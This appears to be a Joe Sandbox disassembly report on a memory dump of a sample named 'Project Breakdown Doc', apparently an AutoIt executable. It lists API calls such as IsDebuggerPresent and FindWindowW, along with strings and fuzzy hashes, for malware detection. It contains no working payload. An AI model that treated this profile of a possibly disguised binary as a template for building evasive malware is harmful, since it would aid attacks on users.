                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: __fread_nolock_memmove
                                                  • String ID: EA06
                                                  • API String ID: 1988441806-3962188686
                                                  • Opcode ID: a0b6dd584ddb175c11502548e9c3a9d2d771c7f7cb2a553f841bd8f3a70c3c16
                                                  • Instruction ID: e5f3145c0b54135d0afad41e6bc8ffb1af709d201bc705af09041954c6f09df1
                                                  • Opcode Fuzzy Hash: a0b6dd584ddb175c11502548e9c3a9d2d771c7f7cb2a553f841bd8f3a70c3c16
                                                  • Instruction Fuzzy Hash: 2D01F9718042186EDB28C7A8CC56EFEBBF8DB05301F00419AF552D2181E575A6049760
                                                  APIs
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                    • Part of subcall function 00C9B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C9B0E7
                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C9924D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: b7aaeb9b99e5aef4cedc5648e6c9ce74cbad55baf8fabf48e9bc31655e8d9c5a
                                                  • Instruction ID: 205bb325fe33b2e04a2a806ae75a43092336200168cdb97b38e4520b321619b1
                                                  • Opcode Fuzzy Hash: b7aaeb9b99e5aef4cedc5648e6c9ce74cbad55baf8fabf48e9bc31655e8d9c5a
                                                  • Instruction Fuzzy Hash: 280184B1A411087BCF14EBA4C996EFF77ACEF55300F14012DB912672C2EA216F1CA672
                                                  APIs
                                                    • Part of subcall function 00C47F41: _memmove.LIBCMT ref: 00C47F82
                                                    • Part of subcall function 00C9B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00C9B0E7
                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C992D0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameSend_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 372448540-1403004172
                                                  • Opcode ID: a4d4f39c8f7cfd2cfe561f2a30d32a820a737f25301b0bd888d395561ab1deb7
                                                  • Instruction ID: 9a89b53b35c2fa25621e5f3c27383acf8e8e0acbfa1e13e74d944ebce52bee32
                                                  • Opcode Fuzzy Hash: a4d4f39c8f7cfd2cfe561f2a30d32a820a737f25301b0bd888d395561ab1deb7
                                                  • Instruction Fuzzy Hash: 510162B1A4121877DF04EBA4C986EFF77ACEF15300F240129B952672D2DA215F1CA676
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ClassName_wcscmp
                                                  • String ID: #32770
                                                  • API String ID: 2292705959-463685578
                                                  • Opcode ID: 102c61ee86facb861f0a62c3361699a551ff5dac37c0b37bd7697b7bba5bb0e6
                                                  • Instruction ID: f237ba27db1688dc5ac2593a3ba686078673dbba86533d57aec1830d0db9fa41
                                                  • Opcode Fuzzy Hash: 102c61ee86facb861f0a62c3361699a551ff5dac37c0b37bd7697b7bba5bb0e6
                                                  • Instruction Fuzzy Hash: 6BE0D872A0432D2BE7209B99EC49FA7FBACEB45771F00016BFD18D7150E570AA458BE1
                                                  APIs
                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C981CA
                                                    • Part of subcall function 00C63598: _doexit.LIBCMT ref: 00C635A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Message_doexit
                                                  • String ID: AutoIt$Error allocating memory.
                                                  • API String ID: 1993061046-4017498283
                                                  • Opcode ID: a70f858800192b67dfeeb842d8ce784ab639163a3a081d82b1641b6cead1bec1
                                                  • Instruction ID: d189b4dec3f3cffaee385bd52ad71301e1b257d308df07cd51452e52fbf24b99
                                                  • Opcode Fuzzy Hash: a70f858800192b67dfeeb842d8ce784ab639163a3a081d82b1641b6cead1bec1
                                                  • Instruction Fuzzy Hash: DDD05B323C535832D62433A46C0BFCD79488B15B52F144426FF08965D38DD1599262D9
                                                  APIs
                                                    • Part of subcall function 00C7B564: _memset.LIBCMT ref: 00C7B571
                                                    • Part of subcall function 00C60B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00C7B540,?,?,?,00C4100A), ref: 00C60B89
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,00C4100A), ref: 00C7B544
                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00C4100A), ref: 00C7B553
                                                  Strings
                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00C7B54E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                  • API String ID: 3158253471-631824599
                                                  • Opcode ID: bc688c11279a9bc04e529ba32e647e344434e9e431fc35aaa6f5a096a47baafa
                                                  • Instruction ID: f30732ba83c7fea912f353e41b4abdd615dc168d3af8423d44ed893242cb0e89
                                                  • Opcode Fuzzy Hash: bc688c11279a9bc04e529ba32e647e344434e9e431fc35aaa6f5a096a47baafa
                                                  • Instruction Fuzzy Hash: C2E092B02007518FD760DF69E5047467BE4BF00709F04C92CE48AC3760DBB4D845CBA1
                                                  APIs
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CC5BF5
                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00CC5C08
                                                    • Part of subcall function 00CA54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00CA555E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: FindMessagePostSleepWindow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 529655941-2988720461
                                                  • Opcode ID: 4c7e26a25c58053e8198f4c772a127eaf46af3b32837489dfbab7269c585e050
                                                  • Instruction ID: df0524edb8c9a1fb2d36b3cc1000fa3e485cccd81e9fbe3e1baf3a93c9fdc042
                                                  • Opcode Fuzzy Hash: 4c7e26a25c58053e8198f4c772a127eaf46af3b32837489dfbab7269c585e050
                                                  • Instruction Fuzzy Hash: E1D01231388311B7E774BB70EC0FFEB6A25AB05B51F014839F749AA1D0D9E45801C654